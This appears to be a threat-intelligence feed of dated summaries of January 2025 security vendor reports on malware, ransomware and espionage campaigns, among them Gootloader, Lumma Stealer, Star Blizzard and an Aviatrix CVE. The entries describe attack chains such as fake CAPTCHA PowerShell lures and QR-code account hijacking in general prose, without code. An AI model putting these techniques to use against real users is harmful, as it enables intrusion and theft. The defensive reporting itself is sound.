Researchers at Sophos have recreated the server-side activities of Gootloader, an SEO-driven threat that uses compromised WordPress sites to lure victims. Gootloader uses hijacked Google search results to send users to legitimate sites that have been altered to display simulated message boards, with malware links embedded in seemingly relevant discussions.
Source: https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/
2025-01-18
RansomHub_Affiliate_Uses_Python_Based_Backdoor
MEDIUM
+
Intel Source:
GuidePoint
Intel Name:
RansomHub_Affiliate_Uses_Python_Based_Backdoor
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
GuidePoint Security researchers have uncovered a Python-based backdoor used by a threat actor to maintain access to compromised devices. The attack begins with initial access through malicious fake updates that impersonate legitimate software updates to trick users; about 20 minutes after the initial infection, the Python backdoor is installed on the compromised device. The attackers then use RDP to spread to other systems in the network and deploy additional Python backdoors. Ultimately, they leverage this access to deploy RansomHub ransomware across the network to encrypt data.
Source: https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/
2025-01-18
Analyzing_a_Web_Shell_Intrusion
LOW
+
Intel Source:
Trend Micro
Intel Name:
Analyzing_a_Web_Shell_Intrusion
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Trend Micro researchers investigated a customer incident involving suspicious activity detected by endpoint sensors. The IIS worker (w3wp.exe) on a public-facing server was compromised when an attacker uploaded a web shell, which was initially unrestricted. This allowed the attacker to create a new account and modify an existing user's password. The attacker also used an encoded PowerShell command to establish a reverse TCP shell for command-and-control communication. Further investigation revealed multiple payloads downloaded to the system, and the attacker’s initial access was traced through web server requests interacting with the web shell.
Source: https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html
2025-01-18
Nickel_Tapestry_Fraud_Connections
LOW
+
Intel Source:
Secureworks
Intel Name:
Nickel_Tapestry_Fraud_Connections
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Researchers at Secureworks Counter Threat Unit have discovered linkages between North Korean IT worker schemes and a 2016 crowdfunding scam. The schemes, attributed to the NICKEL TAPESTRY threat group, included front firms such as Yanbian Silverstar in China and Volasys Silver Star in Russia, both of which were sanctioned by the United States Department of Treasury in 2018.
Source: https://www.secureworks.com/blog/nickel-tapestry-infrastructure-associated-with-crowdfunding-scheme
2025-01-18
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
MEDIUM
+
Intel Source:
Arctic Wolf
Intel Name:
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
Arctic Wolf Labs researchers have observed a recent campaign targeting Fortinet FortiGate firewalls with exposed management interfaces on the public internet. Threat actors gained unauthorized access, creating new accounts, modifying configurations, and extracting credentials. While the initial access vector remains unconfirmed, there is high confidence that a zero-day vulnerability is involved.
Source: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/
2025-01-17
Deep_Dive_Into_a_Linux_Rootkit_Malware
LOW
+
Intel Source:
Fortinet
Intel Name:
Deep_Dive_Into_a_Linux_Rootkit_Malware
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
Fortinet researchers have analyzed rootkit malware that infects Linux systems using a zero-day exploit. The malware has two components: a kernel module and a user-space program. The kernel module creates a hidden communication channel by using a Linux system file and hijacks network traffic. It establishes a secure session and processes encrypted commands, enabling the attacker to restart processes or execute system commands with root privileges. The user-space program appears benign but secretly runs the attacker's commands in the background, coordinating with the kernel module.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware
2025-01-17
Exploitation_of_Aviatrix_Controller_Vulnerability
MEDIUM
+
Intel Source:
WIZ
Intel Name:
Exploitation_of_Aviatrix_Controller_Vulnerability
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
A critical vulnerability, CVE-2024-50603, has been identified in the Aviatrix Controller that allows attackers to execute commands on the system remotely without authentication. The flaw exists because the software does not properly handle user input in its API. The impact is especially severe when the Aviatrix Controller is deployed in AWS cloud environments, because it can also grant attackers high-privilege access. Researchers have also observed attackers exploiting this flaw in the wild to mine cryptocurrency and install backdoors.
Source: https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
2025-01-17
KongTuke_Campaign_Exploits_BOINC
LOW
+
Intel Source:
PaloAlto
Intel Name:
KongTuke_Campaign_Exploits_BOINC
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
KongTuke is a malicious campaign involving injected scripts that create fake "verify you are human" pages on websites. These pages trick users into executing a malicious PowerShell script by copying it into their clipboard and following instructions to run it. The script leads to an infection that exploits BOINC (Berkeley Open Infrastructure for Network Computing), a legitimate platform often used by research organizations. The attackers set up rogue BOINC project servers with domains like rosettahome[.]cn and rosettahome[.]top, attempting to disguise them as legitimate rosetta@home servers. However, these servers are unrelated to rosetta@home and are used for malicious purposes in the campaign.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-13-IOCs-for-Kongtuke-activity.txt
2025-01-17
Star_Blizzard_Targets_WhatsApp_Accounts
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Star_Blizzard_Targets_WhatsApp_Accounts
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
Microsoft researchers have identified that the Russian threat actor known as Star Blizzard is using a new tactic to target victims through WhatsApp. This group often targets government officials, diplomats, defense policy researchers, and those aiding Ukraine in the war with Russia. In this campaign, the group sends spear-phishing emails impersonating a U.S. government official that contain a QR code encouraging recipients to join a WhatsApp group supporting Ukrainian NGOs. The QR code is deliberately non-functional; when the target responds, the attackers send a second email containing a link that redirects the target to a webpage where they are asked to scan another QR code, which actually links their WhatsApp account to the attacker's device. This gives the attacker access to the victim's WhatsApp messages and the ability to exfiltrate data using browser plugins.
Source: https://www.microsoft.com/en-us/security/blog/2025/01/16/new-star-blizzard-spear-phishing-campaign-targets-whatsapp-accounts/
2025-01-16
SharpRhino_A_New_RAT_Malware
LOW
+
Intel Source:
Acronis
Intel Name:
SharpRhino_A_New_RAT_Malware
Date of Scan:
2025-01-16
Impact:
LOW
Summary:
Researchers at Acronis have discovered a new RAT called SharpRhino, developed by Hunters International, a RaaS group. The malware first appeared in 2024 and is designed to provide remote control over a compromised machine. It is delivered to victims as a fake legitimate software installer built with the Nullsoft Scriptable Install System (NSIS). When the installer runs, it installs a PowerShell script that includes .NET payloads, which enable the malware to communicate with its C2 server and allow attackers to execute commands on the compromised machine.
Source: https://www.acronis.com/en-us/cyber-protection-center/posts/sharprhino-an-old-new-threat/
2025-01-16
Double_Tap_Campaign
MEDIUM
+
Intel Source:
Sekoia
Intel Name:
Double_Tap_Campaign
Date of Scan:
2025-01-16
Impact:
MEDIUM
Summary:
Researchers from Sekoia have uncovered a cyber espionage campaign called Double Tap conducted by UAC-0063, a Russia-linked hacking group associated with APT28 (GRU). The campaign weaponized legitimate documents from Kazakhstan's Ministry of Foreign Affairs as malicious Word documents to target Central Asia. The attackers use macro-embedded Word documents that install HATVIBE, a backdoor that downloads and executes additional payloads, followed by a more advanced Python-based backdoor called CHERRYSPY. The purpose of the operation is to gather intelligence on Kazakhstan's diplomatic relations and geopolitical activities, such as its economic partnerships with Western countries and China and its role in the Middle Corridor trade route in Central Asia.
Source: https://blog.sekoia.io/double-tap-campaign-russia-nexus-apt-possibly-related-to-apt28-conducts-cyber-espionage-on-central-asia-and-kazakhstan-diplomatic-relations/
2025-01-15
CVE_2017_0199_Exploit_Campaign_Targets_with_RATs
LOW
+
Intel Source:
https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt
Intel Name:
CVE_2017_0199_Exploit_Campaign_Targets_with_RATs
Date of Scan:
2025-01-15
Impact:
LOW
Summary:
Criminals have been exploiting CVE-2017-0199 through malicious Microsoft Office documents for years, targeting outdated systems, yet new exploit samples continue to appear regularly. A campaign active since 2023 or earlier primarily distributes DBatLoader/GuLoader-style malware, which is delivered via a .NET DLL embedded in an image using steganography and reversed base64 encoding. Recent variations of the malware have been linked to remote access tools (RATs) such as AgentTesla, Formbook (XLoader), LokiBot, and Remcos.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt
2025-01-13
Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware
Date of Scan:
2025-01-13
Impact:
LOW
Summary:
Lumma Stealer malware is using fake CAPTCHA challenges to deceive users into executing malicious scripts. In a campaign observed by CERT-AGID in October 2024, victims were misled by a fake CAPTCHA warning about a security issue with their GitHub repositories. Following the CAPTCHA's instructions led to executing a PowerShell script that infected systems with Lumma Stealer. Additionally, an Italian domain running outdated WordPress was compromised to spread the malware through a hidden Base64-encoded JavaScript that generated a fake CAPTCHA for Windows users. Executing the script triggered the malware download and installation.
Source: https://cert-agid.gov.it/news/analisi-di-una-campagna-lumma-stealer-con-falso-captcha-condotta-attraverso-domino-italiano-compromesso/
2025-01-13
FunkSec_Ransomware_Group
LOW
+
Intel Source:
CheckPoint
Intel Name:
FunkSec_Ransomware_Group
Date of Scan:
2025-01-13
Impact:
LOW
Summary:
Checkpoint researchers have uncovered a new ransomware group called FunkSec, which first emerged in 2024 and operates as a Ransomware-as-a-Service (RaaS) group. The group has compromised 85 victims in just one month of activity. It combines cybercrime with hacktivism, which makes its motives unclear. It employs double extortion tactics, stealing sensitive data and encrypting victims' files before demanding a ransom to restore access. Its operations are run by inexperienced attackers who leverage AI tools to develop their malware. They target organisations in India and the U.S., often connecting their attacks to political causes such as the Free Palestine movement.
Source: https://research.checkpoint.com/2025/funksec-alleged-top-ransomware-group-powered-by-ai/
2025-01-12
Banshee_MacOS_Stealer
LOW
+
Intel Source:
Checkpoint
Intel Name:
Banshee_MacOS_Stealer
Date of Scan:
2025-01-12
Impact:
LOW
Summary:
Researchers at Check Point have identified a macOS malware called Banshee that targets macOS users to steal sensitive information such as browser credentials, cryptocurrency wallet data, and files. It first appeared in July 2024 and is operated by Russian-speaking cybercriminals as a stealer-as-a-service on platforms such as Telegram and dark web forums (XSS and Exploit). The advanced version of the malware replaces plain-text strings with string encryption copied from Apple's XProtect antivirus. It is distributed through phishing emails and malicious GitHub repositories. The malware is capable of stealing data from popular browsers such as Chrome, Brave, Edge, and Opera, as well as from browser extensions related to cryptocurrency wallets and two-factor authentication tools.
Source: https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/
2025-01-12
Malware_Spread_via_Fake_Installers_on_Social_Media
LOW
+
Intel Source:
Trend Micro
Intel Name:
Malware_Spread_via_Fake_Installers_on_Social_Media
Date of Scan:
2025-01-12
Impact:
LOW
Summary:
Researchers at Trend Micro have observed the growing threat of attackers using platforms such as YouTube and social media to share links to fake installers that lead to malicious sites. The malicious downloads are often hosted on reputable services such as Mediafire and Mega.nz to evade detection. Many of them are password-protected and encoded, making them difficult for security tools to analyze. Once installed, the malware steals sensitive data, including web browser credentials. The research highlights how attackers exploit software piracy and pose as legitimate software guides on YouTube to trick users into clicking harmful links, ultimately compromising their devices.
Source: https://www.trendmicro.com/en_us/research/25/a/how-cracks-and-installers-bring-malware-to-your-device.html
2025-01-12
RedCurl_Cyberespionage_in_Canada
MEDIUM
+
Intel Source:
Huntress
Intel Name:
RedCurl_Cyberespionage_in_Canada
Date of Scan:
2025-01-12
Impact:
MEDIUM
Summary:
Researchers at Huntress have discovered cyberespionage activity targeting various Canadian organizations, which they connect to the APT group RedCurl (also known as Earth Kapre or Red Wolf). RedCurl, which has been active since at least November 2023, uses new and developing strategies to get access to and exfiltrate sensitive material, such as emails and company records, while avoiding detection.
Source: https://www.huntress.com/blog/the-hunt-for-redcurl-2
2025-01-11
TA397_Bitter_APT_Espionage_Campaigns
LOW
+
Intel Source:
Cyfirma
Intel Name:
TA397_Bitter_APT_Espionage_Campaigns
Date of Scan:
2025-01-11
Impact:
LOW
Summary:
Researchers at Cyfirma have profiled TA397, also known as Bitter, a South Asian cyber espionage group that targets government, energy, telecommunications, defense, and engineering organizations in the EMEA and APAC regions. TA397 uses complex tactics to deliver payloads, including RAR archives containing alternate data streams (ADS) and decoy files.
Source: https://www.cyfirma.com/research/apt-profile-ta397/
2025-01-11
CrowdStrike_Recruitment_Phishing_Scam
LOW
+
Intel Source:
CrowdStrike
Intel Name:
CrowdStrike_Recruitment_Phishing_Scam
Date of Scan:
2025-01-11
Impact:
LOW
Summary:
On January 7, 2025, CrowdStrike reported a phishing campaign using its recruitment branding to distribute malware. The attack starts with a phishing email impersonating CrowdStrike's recruitment team, leading victims to a malicious website. There, they are tricked into downloading a fake "employee CRM application," which serves as a downloader for the XMRig cryptominer.
Source: https://www.crowdstrike.com/en-us/blog/recruitment-phishing-scam-imitates-crowdstrike-hiring-process/
2025-01-11
Hexalocker_Ransomware_V2
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Hexalocker_Ransomware_V2
Date of Scan:
2025-01-11
Impact:
MEDIUM
Summary:
Cyble researchers have analyzed version 2 of the HexaLocker ransomware, which first emerged in 2024. This version modifies registry keys and creates Run entries to ensure the malware executes even after a system reboot. It employs a double extortion tactic, exfiltrating sensitive information before encryption and forcing victims to pay for both data recovery and confidentiality. The ransomware uses ChaCha20 to encrypt files and incorporates the Skuld stealer, which steals browser data, cookies, saved credit card details, login credentials, and cryptocurrency wallet information. The attackers append the .HexaLockerv2 extension and communicate with victims through a unique hash instead of the traditional methods used previously.
Source: https://cyble.com/blog/hexalocker-v2-being-proliferated-by-skuld-stealer/
2025-01-10
Fake_PoC_Exploit_for_LDAPNightmare
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Fake_PoC_Exploit_for_LDAPNightmare
Date of Scan:
2025-01-10
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered a fake proof-of-concept (PoC) exploit for CVE-2024-49113 (LDAPNightmare) being used to distribute information-stealing malware. The vulnerability, a denial-of-service weakness in Microsoft LDAP, was patched in December 2024 alongside CVE-2024-49112, a remote code execution bug. The malicious repository, masquerading as a legitimate Python-based PoC, replaced the original files with a UPX-packed executable (poc.exe), posing a serious threat to security researchers and companies.
Source: https://www.trendmicro.com/en_us/research/25/a/information-stealer-masquerades-as-ldapnightmare-poc-exploit.html